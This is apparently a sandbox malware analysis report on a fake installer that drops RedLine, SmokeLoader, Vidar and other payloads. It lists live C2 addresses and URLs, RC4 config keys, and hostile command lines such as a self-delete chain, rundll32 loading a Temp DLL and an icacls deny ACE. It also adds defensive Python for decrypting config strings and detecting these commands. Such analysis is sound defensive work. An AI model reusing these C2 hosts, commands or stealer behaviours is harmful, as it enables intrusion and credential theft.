
Resubmissions

  11/07/2024, 05:43 UTC   240711-gej4lstgrf   score 10
  06/09/2021, 14:13 UTC   210906-rjpvrsedbm   score 10
  08/07/2021, 11:08 UTC   210708-4gztl3mwl6   score 10
  08/07/2021, 08:02 UTC   210708-klfb4qeda6   score 10
  07/07/2021, 09:39 UTC   210707-nem57xyvf2   score 10
  06/07/2021, 17:51 UTC   210706-7pcrmjy3fa   score 10
  06/07/2021, 13:45 UTC   210706-eybelwcq86   score 10

Analysis

  • max time kernel: 18s
  • max time network: 308s
  • platform: windows7_x64
  • resource: win7v20210408
  • submitted: 28/06/2021, 15:53 UTC

Errors

  Reason: Remote task has failed: Machine shutdown

General

  • Target: setup_x86_x64_install - копия (13).exe  (копия is Russian for "copy", i.e. a Windows-style "<name> - copy (13)" duplicate filename)
  • Size: 3.2MB
  • MD5: 3ae1c212119919e5fce71247286f8e0e
  • SHA1: 97c1890ab73c539056f95eafede319df774e9d38
  • SHA256: 30c2f230e5401b4b1ea8fb425dadf4e453575884303b9fa2066e6a91859f016e
  • SHA512: 5bb28a775c10b8b68b8c448d64287ca732d0af5577ecc4348a89934358440bb4ff6958115f14ecbabb0446d234d6f621afa3419daa4aec6c03c0af9b6a3b1558

Malware Config

Extracted
  Family:  redline
  Botnet:  ServAni
  C2:      87.251.71.195:82

Extracted
  Family:  smokeloader
  Version: 2020
  C2:
    http://ppcspb.com/upload/
    http://mebbing.com/upload/
    http://twcamel.com/upload/
    http://howdycash.com/upload/
    http://lahuertasonora.com/upload/
    http://kpotiques.com/upload/
  rc4.i32:  1  0x3b22e540
  rc4.i32:  1  0xa6b397e0

Extracted
  Family:  metasploit
  Version: windows/single_exec
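The SmokeLoader entry reports two 32-bit RC4 keys (rc4.i32) next to its C2 list; an extractor recovers these so that the encrypted strings in a memory dump can be decoded. The following Python is an added example, not the tria.ge extractor and not SmokeLoader's own code: a plain RC4 plus a helper that packs the i32 value into key bytes and tries each key and byte order against a blob. The little-endian packing, the URL-shaped plausibility check and the sample blob (constructed here by encrypting one of the listed C2 URLs under the first key) are assumptions, not data taken from the sample.

```python
"""RC4 keyed from the 32-bit `rc4.i32` values in the extracted SmokeLoader config.

Added example, not tria.ge's extractor. Assumptions (labelled): the i32 value is
packed little-endian into a 4-byte RC4 key, and demo_blob() is constructed here,
not lifted from the sample.
"""
import struct

RC4_I32_KEYS = (0x3b22e540, 0xa6b397e0)   # from the Malware Config section


def key_from_i32(value: int, little_endian: bool = True) -> bytes:
    """Pack a 32-bit config value into the 4-byte key RC4 is run with.
    The byte order is an assumption; try both if a decrypt yields garbage."""
    return struct.pack("<I" if little_endian else ">I", value & 0xFFFFFFFF)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encrypt and decrypt are the same operation."""
    if not key:
        raise ValueError("RC4 key must be non-empty")
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation, XORed in
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def looks_like_c2(plain: bytes) -> bool:
    """Cheap plausibility check for a decrypted config string: printable ASCII
    that starts like an http(s) URL. Heuristic, not a property of the family."""
    try:
        text = plain.decode("ascii")
    except UnicodeDecodeError:
        return False
    return text.isprintable() and text.startswith(("http://", "https://"))


def try_keys(blob: bytes, keys=RC4_I32_KEYS) -> list:
    """Return (key_value, byte_order, plaintext) for every key/order combination
    whose output looks like a C2 URL; empty list if none does."""
    hits = []
    for value in keys:
        for le in (True, False):
            plain = rc4(key_from_i32(value, le), blob)
            if looks_like_c2(plain):
                hits.append((value, "little" if le else "big", plain.decode("ascii")))
    return hits


def demo_blob() -> bytes:
    """Constructed test input: one listed C2 URL encrypted under the first key."""
    return rc4(key_from_i32(RC4_I32_KEYS[0]), b"http://ppcspb.com/upload/")


if __name__ == "__main__":
    for value, order, url in try_keys(demo_blob()):
        print(f"0x{value:08x} ({order}-endian): {url}")
```

Against a real dump, replace demo_blob() with the bytes pulled from the string table; a wrong byte order or a key belonging to a different build simply produces no plausible hit, which is the signal to try the other key.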

Signatures

  • Glupteba
    Glupteba is a modular loader written in Golang with various components.
  • Glupteba Payload (2 IoCs)
  • MetaSploit
    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
  • PlugX
    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
  • RedLine
    RedLine Stealer is a malware family written in C#, first appearing in early 2020.
  • RedLine Payload (4 IoCs)
  • SmokeLoader
    Modular backdoor trojan in use since 2014.
  • Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  • Vidar
    Vidar is an infostealer based on Arkei stealer.
  • Vidar Stealer (6 IoCs)
  • ASPack v2.12-2.42 (14 IoCs)
    Detects executables packed with ASPack v2.12-2.42.
  • Downloads MZ/PE file
  • Executes dropped EXE (10 IoCs)
  • UPX packed file (6 IoCs)
    Detects executables packed with UPX or a modified UPX open-source packer.
  • Loads dropped DLL (44 IoCs)
  • Modifies file permissions (1 TTP, 1 IoC)
  • Legitimate hosting services abused for malware hosting/C2 (1 TTP)
  • Looks up external IP address via web service (5 IoCs)
    Uses a legitimate IP lookup service to find the infected system's external IP.
  • Suspicious use of SetThreadContext (1 IoC)
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  • Program crash (1 IoC)
  • Delays execution with timeout.exe (2 IoCs)
  • Kills process with taskkill (2 IoCs)
  • Modifies registry class (8 IoCs)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (3 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

Each entry is the image path as recorded, the command line as passed by the parent, then the tree depth (N⤵), the PID and the behaviours flagged on that process. Indentation follows the depth marker.

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵  PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵  PID:868  flags: Suspicious use of NtCreateUserProcessOtherParentProcess; Suspicious use of SetThreadContext; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵  PID:1352  flags: Modifies registry class
  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (13).exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (13).exe"
    1⤵  PID:1940  flags: Loads dropped DLL; Suspicious use of WriteProcessMemory
      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
        2⤵  PID:1980  flags: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
          • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\setup_install.exe
            "C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\setup_install.exe"
            3⤵  PID:1380  flags: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c arnatic_1.exe
                4⤵  PID:1592  flags: Loads dropped DLL; Suspicious use of WriteProcessMemory
                  • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_1.exe
                    arnatic_1.exe
                    5⤵  PID:1800  flags: Executes dropped EXE; Loads dropped DLL
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_1.exe" & del C:\ProgramData\*.dll & exit
                        6⤵  PID:2536
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im arnatic_1.exe /f
                            7⤵  PID:2564  flags: Kills process with taskkill
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout /t 6
                            7⤵  PID:2720  flags: Delays execution with timeout.exe
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c arnatic_2.exe
                4⤵  PID:824  flags: Loads dropped DLL; Suspicious use of WriteProcessMemory
                  • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_2.exe
                    arnatic_2.exe
                    5⤵  PID:1880  flags: Executes dropped EXE; Loads dropped DLL
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c arnatic_3.exe
                4⤵  PID:276  flags: Loads dropped DLL; Suspicious use of WriteProcessMemory
                  • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_3.exe
                    arnatic_3.exe
                    5⤵  PID:400  flags: Executes dropped EXE; Loads dropped DLL
                      • C:\Windows\SysWOW64\rUNdlL32.eXe
                        "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                        6⤵  PID:2044  flags: Loads dropped DLL; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c arnatic_4.exe
                4⤵  PID:1760  flags: Loads dropped DLL
                  • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_4.exe
                    arnatic_4.exe
                    5⤵  PID:976  flags: Executes dropped EXE; Loads dropped DLL
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        6⤵  PID:1948  flags: Executes dropped EXE; Loads dropped DLL
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        6⤵  PID:2104
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c arnatic_5.exe
                4⤵  PID:1072  flags: Loads dropped DLL
                  • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_5.exe
                    arnatic_5.exe
                    5⤵  PID:1060  flags: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
                      • C:\Users\Admin\AppData\Roaming\4316293.exe
                        "C:\Users\Admin\AppData\Roaming\4316293.exe"
                        6⤵  PID:912
                      • C:\Users\Admin\AppData\Roaming\3844751.exe
                        "C:\Users\Admin\AppData\Roaming\3844751.exe"
                        6⤵  PID:1680
                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                            7⤵  PID:1640
                      • C:\Users\Admin\AppData\Roaming\6243650.exe
                        "C:\Users\Admin\AppData\Roaming\6243650.exe"
                        6⤵  PID:720
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c arnatic_7.exe
                4⤵  PID:272  flags: Loads dropped DLL
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c arnatic_6.exe
                4⤵  PID:1672  flags: Loads dropped DLL
  • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_7.exe
    arnatic_7.exe
    1⤵  PID:1408  flags: Executes dropped EXE; Loads dropped DLL
      • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_7.exe
        C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_7.exe
        2⤵  PID:1764
      • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_7.exe
        C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_7.exe
        2⤵  PID:1960
  • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_6.exe
    arnatic_6.exe
    1⤵  PID:792  flags: Executes dropped EXE
      • C:\Users\Admin\Documents\HNyId4M7oNxMw87KN0VIjSrc.exe
        "C:\Users\Admin\Documents\HNyId4M7oNxMw87KN0VIjSrc.exe"
        2⤵  PID:2144
          • C:\Users\Admin\Documents\HNyId4M7oNxMw87KN0VIjSrc.exe
            "C:\Users\Admin\Documents\HNyId4M7oNxMw87KN0VIjSrc.exe"
            3⤵  PID:1912
      • C:\Users\Admin\Documents\dz9WQL1PdDlZXNncwUDfARcj.exe
        "C:\Users\Admin\Documents\dz9WQL1PdDlZXNncwUDfARcj.exe"
        2⤵  PID:2128
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            3⤵  PID:2328
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            3⤵  PID:2820
      • C:\Users\Admin\Documents\5rM7fwipKKUcI1_q522hXxRC.exe
        "C:\Users\Admin\Documents\5rM7fwipKKUcI1_q522hXxRC.exe"
        2⤵  PID:2120
      • C:\Users\Admin\Documents\u3EiziyyYvLXfIaxE40G1DwJ.exe
        "C:\Users\Admin\Documents\u3EiziyyYvLXfIaxE40G1DwJ.exe"
        2⤵  PID:2200
          • C:\Users\Admin\Documents\u3EiziyyYvLXfIaxE40G1DwJ.exe
            "C:\Users\Admin\Documents\u3EiziyyYvLXfIaxE40G1DwJ.exe"
            3⤵  PID:2580
          • C:\Users\Admin\Documents\u3EiziyyYvLXfIaxE40G1DwJ.exe
            "C:\Users\Admin\Documents\u3EiziyyYvLXfIaxE40G1DwJ.exe"
            3⤵  PID:2704
      • C:\Users\Admin\Documents\1PVjIVI19flXRFoXeapzSVuk.exe
        "C:\Users\Admin\Documents\1PVjIVI19flXRFoXeapzSVuk.exe"
        2⤵  PID:2172
      • C:\Users\Admin\Documents\0UlIW8lQMIOGUdEPwti__XaI.exe
        "C:\Users\Admin\Documents\0UlIW8lQMIOGUdEPwti__XaI.exe"
        2⤵  PID:2224
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c taskkill /im 0UlIW8lQMIOGUdEPwti__XaI.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\0UlIW8lQMIOGUdEPwti__XaI.exe" & del C:\ProgramData\*.dll & exit
            3⤵  PID:2116
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /im 0UlIW8lQMIOGUdEPwti__XaI.exe /f
                4⤵  PID:1600  flags: Kills process with taskkill
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 6
                4⤵  PID:824  flags: Delays execution with timeout.exe
      • C:\Users\Admin\Documents\7knLLIUqmKADFwZofzpMEp1D.exe
        "C:\Users\Admin\Documents\7knLLIUqmKADFwZofzpMEp1D.exe"
        2⤵  PID:2348
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2348 -s 952
            3⤵  PID:756  flags: Program crash
      • C:\Users\Admin\Documents\jlhL_mHbm6Sl4i65mBU7lVzy.exe
        "C:\Users\Admin\Documents\jlhL_mHbm6Sl4i65mBU7lVzy.exe"
        2⤵  PID:2360
          • C:\Windows\SysWOW64\rUNdlL32.eXe
            "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
            3⤵  PID:2468
      • C:\Users\Admin\Documents\EbefUJnXG3dXkpQTI2sHdm_X.exe
        "C:\Users\Admin\Documents\EbefUJnXG3dXkpQTI2sHdm_X.exe"
        2⤵  PID:2616
  • C:\Users\Admin\AppData\Local\Temp\5A21.exe
    C:\Users\Admin\AppData\Local\Temp\5A21.exe
    1⤵  PID:1436
      • C:\Users\Admin\AppData\Local\Temp\5A21.exe
        C:\Users\Admin\AppData\Local\Temp\5A21.exe
        2⤵  PID:1848
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Users\Admin\AppData\Local\10ec7627-dfdf-4741-a8f9-15de45a57a32" /deny *S-1-1-0:(OI)(CI)(DE,DC)
            3⤵  PID:2272  flags: Modifies file permissions
          • C:\Users\Admin\AppData\Local\Temp\5A21.exe
            "C:\Users\Admin\AppData\Local\Temp\5A21.exe" --Admin IsNotAutoStart IsNotTask
            3⤵  PID:2240
  • C:\Users\Admin\AppData\Local\Temp\6AF4.exe
    C:\Users\Admin\AppData\Local\Temp\6AF4.exe
    1⤵  PID:2340
  • C:\Users\Admin\AppData\Local\Temp\9233.exe
    C:\Users\Admin\AppData\Local\Temp\9233.exe
    1⤵  PID:856
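Three command lines in the tree are worth turning into detections rather than reading once: the cmd /c taskkill & timeout & del chain that a dropper uses to erase itself after handing off (PIDs 2536 and 2116), rundll32 (spelled rUNdlL32.eXe to dodge naive string matches) loading axhub.dll out of Temp, and the icacls /deny ACE that strips delete rights from Everyone (S-1-1-0) on a dropped folder. The Python below is an added example, not tria.ge's signature engine: the ProcEvent records are constructed from the tree, and the record schema and rule names are assumptions. Each rule returns a structured hit so the decoded pieces (delay, export name, principal, rights) land in the alert instead of the raw string.

```python
"""Command-line detections for the behaviours flagged in the process tree above:
the taskkill/timeout/del self-delete chain, rundll32 loading a DLL from a
user-writable directory, and an icacls deny ACE on a dropped folder.

Added example, not tria.ge's signature engine. The ProcEvent records are
constructed from the tree (image path, command line, PID); the record schema
and the rule names are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str      # image path as recorded (note the SysWOW64 redirection)
    cmdline: str    # command line as the parent passed it


EVENTS = [  # constructed from the tree above
    ProcEvent(1592, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\system32\cmd.exe /c arnatic_1.exe"),
    ProcEvent(2536, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & '
              r'del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_1.exe" & del C:\ProgramData\*.dll & exit'),
    ProcEvent(2044, r"C:\Windows\SysWOW64\rUNdlL32.eXe",
              r'"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub'),
    ProcEvent(2272, r"C:\Windows\SysWOW64\icacls.exe",
              r'icacls "C:\Users\Admin\AppData\Local\10ec7627-dfdf-4741-a8f9-15de45a57a32" /deny *S-1-1-0:(OI)(CI)(DE,DC)'),
]

USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|documents|downloads|desktop)\\", re.I)
INHERIT_FLAGS = {"OI", "CI", "IO", "NP"}      # icacls inheritance tokens
RIGHTS = {"DE": "delete", "DC": "delete child", "WD": "write data", "AD": "append data",
          "F": "full", "M": "modify", "RX": "read & execute", "R": "read", "W": "write"}
WELL_KNOWN_SIDS = {"S-1-1-0": "Everyone", "S-1-5-18": "SYSTEM", "S-1-5-32-544": "Administrators"}


def is_image(ev: ProcEvent, name: str) -> bool:
    """Match on the image basename, case-insensitively (rUNdlL32.eXe is rundll32.exe)."""
    return ev.image.rsplit("\\", 1)[-1].lower() == name


def self_delete_chain(ev: ProcEvent):
    """cmd /c taskkill <x> /f & timeout /t N & del <x>: a dropper erasing itself
    after handing off. All three verbs must be present and the deleted file must
    be the killed image, otherwise ordinary cleanup scripts would fire."""
    if not is_image(ev, "cmd.exe"):
        return None
    kill = re.search(r"taskkill\s+/im\s+(\S+)\s+/f", ev.cmdline, re.I)
    wait = re.search(r"timeout\s+/t\s+(\d+)", ev.cmdline, re.I)
    dele = re.search(r'del\s+/f\s+/q\s+"([^"]+)"', ev.cmdline, re.I)
    if not (kill and wait and dele):
        return None
    killed = kill.group(1).lower()
    if killed != dele.group(1).rsplit("\\", 1)[-1].lower():
        return None
    return {"rule": "self_delete_chain", "pid": ev.pid, "image": killed, "delay_s": int(wait.group(1))}


def rundll32_user_dll(ev: ProcEvent):
    """rundll32 given a DLL path under a user-writable directory, plus the export it calls."""
    if not is_image(ev, "rundll32.exe"):
        return None
    m = re.search(r'"?([^"\s,]+\.dll)"?\s*,\s*(\S+)', ev.cmdline, re.I)
    if not m or not USER_WRITABLE.search(m.group(1)):
        return None
    return {"rule": "rundll32_user_writable_dll", "pid": ev.pid, "dll": m.group(1), "export": m.group(2)}


def icacls_deny(ev: ProcEvent):
    """Decode an icacls /deny ACE: principal (SID or name), inheritance flags and rights."""
    if not is_image(ev, "icacls.exe"):
        return None
    m = re.search(r'icacls\s+"([^"]+)"\s+/deny\s+\*?(S-\d[-\d]*|\w+):(.+)$', ev.cmdline, re.I)
    if not m:
        return None
    target, who, spec = m.groups()
    tokens = [t for grp in re.findall(r"\(([^)]+)\)", spec) for t in grp.split(",")]
    return {"rule": "icacls_deny", "pid": ev.pid, "target": target,
            "principal": WELL_KNOWN_SIDS.get(who, who),
            "inheritance": [t for t in tokens if t in INHERIT_FLAGS],
            "rights": [RIGHTS.get(t, t) for t in tokens if t not in INHERIT_FLAGS]}


RULES = (self_delete_chain, rundll32_user_dll, icacls_deny)


def run_detections(events):
    """Apply every rule to every event; return the hits in event order."""
    return [hit for ev in events for rule in RULES if (hit := rule(ev))]


if __name__ == "__main__":
    for hit in run_detections(EVENTS):
        print(hit)
```

The plain `cmd /c arnatic_1.exe` launcher (PID 1592) produces no hit, which is the point of requiring all three verbs and a matching filename: the chain, not any one of its parts, is the signal.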

                                                              Network

                                                              • flag-unknown
                                                                DNS
                                                                motiwa.xyz
                                                                setup_install.exe
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                motiwa.xyz
                                                                IN A
                                                                Response
                                                                motiwa.xyz
                                                                IN A
                                                                104.21.12.59
                                                                motiwa.xyz
                                                                IN A
                                                                172.67.193.180
                                                              • flag-unknown
                                                                GET
                                                                http://motiwa.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4&oname[]=25June325AM&oname[]=7&oname[]=1&oname[]=2&oname[]=3&oname[]=4&oname[]=5&oname[]=6&cnt=7
                                                                setup_install.exe
                                                                Remote address:
                                                                104.21.12.59:80
                                                                Request
                                                                GET /addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4&oname[]=25June325AM&oname[]=7&oname[]=1&oname[]=2&oname[]=3&oname[]=4&oname[]=5&oname[]=6&cnt=7 HTTP/1.1
                                                                Host: motiwa.xyz
                                                                Accept: */*
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0af4f634200000012a3aa7f000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=vBhvJm7C7hWODKE3EKapiem2s%2BwIbgpunvN8fczydzqo9zlnUWCxCyVNzMQLfIJThPEzg6mgOualttll5B%2B35dKC4TyJFIAUANLGoufKegww0PelNyUXzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 6668263368e5012a-AMS
                                                              • flag-unknown
                                                                DNS
                                                                ip-api.com
                                                                arnatic_4.exe
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                ip-api.com
                                                                IN A
                                                                Response
                                                                ip-api.com
                                                                IN A
                                                                208.95.112.1
                                                              • flag-unknown
                                                                GET
                                                                http://ip-api.com/json/
                                                                arnatic_4.exe
                                                                Remote address:
                                                                208.95.112.1:80
                                                                Request
                                                                GET /json/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                viewport-width: 1920
                                                                Host: ip-api.com
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:11 GMT
                                                                Content-Type: application/json; charset=utf-8
                                                                Content-Length: 323
                                                                Access-Control-Allow-Origin: *
                                                                X-Ttl: 60
                                                                X-Rl: 44
                                                              • flag-unknown
                                                                DNS
                                                                email.yg9.me
                                                                SystemNetworkService
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                email.yg9.me
                                                                IN A
                                                                Response
                                                                email.yg9.me
                                                                IN A
                                                                198.13.62.186
                                                              • flag-unknown
                                                                DNS
                                                                email.yg9.me
                                                                SystemNetworkService
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                email.yg9.me
                                                                IN AAAA
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                videoconvert-download38.xyz
                                                                arnatic_5.exe
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                videoconvert-download38.xyz
                                                                IN A
                                                                Response
                                                                videoconvert-download38.xyz
                                                                IN A
                                                                172.67.201.250
                                                                videoconvert-download38.xyz
                                                                IN A
                                                                104.21.42.63
                                                              • flag-unknown
                                                                DNS
                                                                www.facebook.com
                                                                arnatic_4.exe
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                www.facebook.com
                                                                IN A
                                                                Response
                                                                www.facebook.com
                                                                IN CNAME
                                                                star-mini.c10r.facebook.com
                                                                star-mini.c10r.facebook.com
                                                                IN A
                                                                31.13.83.36
                                                              • flag-unknown
                                                                DNS
                                                                iplogger.org
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                iplogger.org
                                                                IN A
                                                                Response
                                                                iplogger.org
                                                                IN A
                                                                88.99.66.31
                                                              • flag-unknown
                                                                GET
                                                                http://136.144.41.133/server.txt
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                GET /server.txt HTTP/1.1
                                                                Connection: Keep-Alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:25 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Thu, 17 Jun 2021 16:41:11 GMT
                                                                ETag: "13-5c4f8dfe8a764"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 19
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/plain
•
                                                                DNS
                                                                ipinfo.io
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                ipinfo.io
                                                                IN A
                                                                Response
                                                                ipinfo.io
                                                                IN A
                                                                34.117.59.81
•
                                                                DNS
                                                                pki.goog
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                pki.goog
                                                                IN A
                                                                Response
                                                                pki.goog
                                                                IN A
                                                                216.239.32.29
•
                                                                GET
                                                                http://pki.goog/gsr1/gsr1.crt
                                                                Remote address:
                                                                216.239.32.29:80
                                                                Request
                                                                GET /gsr1/gsr1.crt HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Microsoft-CryptoAPI/6.1
                                                                Host: pki.goog
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Accept-Ranges: bytes
                                                                Vary: Accept-Encoding
                                                                Content-Type: application/pkix-cert
                                                                Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                Cross-Origin-Resource-Policy: same-site
                                                                Content-Length: 889
                                                                Date: Mon, 28 Jun 2021 15:26:12 GMT
                                                                Expires: Mon, 28 Jun 2021 16:26:12 GMT
                                                                Last-Modified: Wed, 20 May 2020 16:45:00 GMT
                                                                X-Content-Type-Options: nosniff
                                                                Server: sffe
                                                                X-XSS-Protection: 0
                                                                Age: 2295
                                                                Cache-Control: public, max-age=3600
•
                                                                DNS
                                                                sergeevih43.tumblr.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                sergeevih43.tumblr.com
                                                                IN A
                                                                Response
                                                                sergeevih43.tumblr.com
                                                                IN A
                                                                74.114.154.22
                                                                sergeevih43.tumblr.com
                                                                IN A
                                                                74.114.154.18
•
                                                                POST
                                                                http://136.144.41.152/base/api/getData.php
                                                                Remote address:
                                                                136.144.41.152:80
                                                                Request
                                                                POST /base/api/getData.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Content-Length: 133
                                                                Host: 136.144.41.152
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:28 GMT
